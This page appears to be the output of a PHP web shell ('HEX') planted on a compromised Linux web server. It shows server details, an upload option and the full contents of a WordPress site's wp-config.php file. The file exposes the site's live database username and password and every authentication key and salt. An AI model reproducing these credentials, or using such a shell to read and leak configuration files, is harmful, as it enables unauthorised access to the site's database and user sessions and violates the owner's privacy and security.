HEX
HEX
Server: Apache/2
System: Linux server.lbnode.com 5.15.0-134-generic #145-Ubuntu SMP Wed Feb 12 20:08:39 UTC 2025 x86_64
User: famous (1004)
PHP: 8.1.32
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/famous/domains/famousboxers.org/private_html/wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'famous_boxers');

/** MySQL database username */
define('DB_USER', 'famous_boxers');

/** MySQL database password */
define('DB_PASSWORD', 'Y4SA3Z3yw0');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         '4!vj`+8j]Z8_|X!8E,loRZbMjZF)&R;9Shs, wWfC;6;GJvRBbo0>$`6hBhRO6Rw');
define('SECURE_AUTH_KEY',  'u=nqV;L-A^jRMF%pxo(Ux :.YmSt|koinrJ/hIG]ZqDOu:/PpW4+Q,[4]QI~lG[k');
define('LOGGED_IN_KEY',    '<?KjTH/zJ>m$MjG>SH:f(*GkK [y},-SMP.6]wfm]Mr2M3-.Bz,q4o~HYg%P4XN(');
define('NONCE_KEY',        'zHmYZ]1-8~H!ehKG0.S81 32N_qfhl!iehyl:JTfE2,|35+i~h6-5!!Q +`u2n0:');
define('AUTH_SALT',        '1 =zDbM^P/`v=BehH?vaCTK.8[u(TXs_`}[>ZX%^Szf,oa?qq+OwmQ9bb-8vCUY6');
define('SECURE_AUTH_SALT', '#)q>m0hL(-2F2Z!));<9v{aEHPaW#.nsoSk_y972R@yJ([xdr}/z&S*fow=El<7_');
define('LOGGED_IN_SALT',   's*jU;/bi2:@XM@+pzVeIBkUTh;ukxiu5L!|!8>2xOm~=ji5}Xddl`K$a$LP),0%4');
define('NONCE_SALT',       'j*?{k3xAdD|efxEiIC;Jj*$$d7LyVJ85>ceL85JdxJ<[-DBKX!^DYms%+rG6@`(4');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');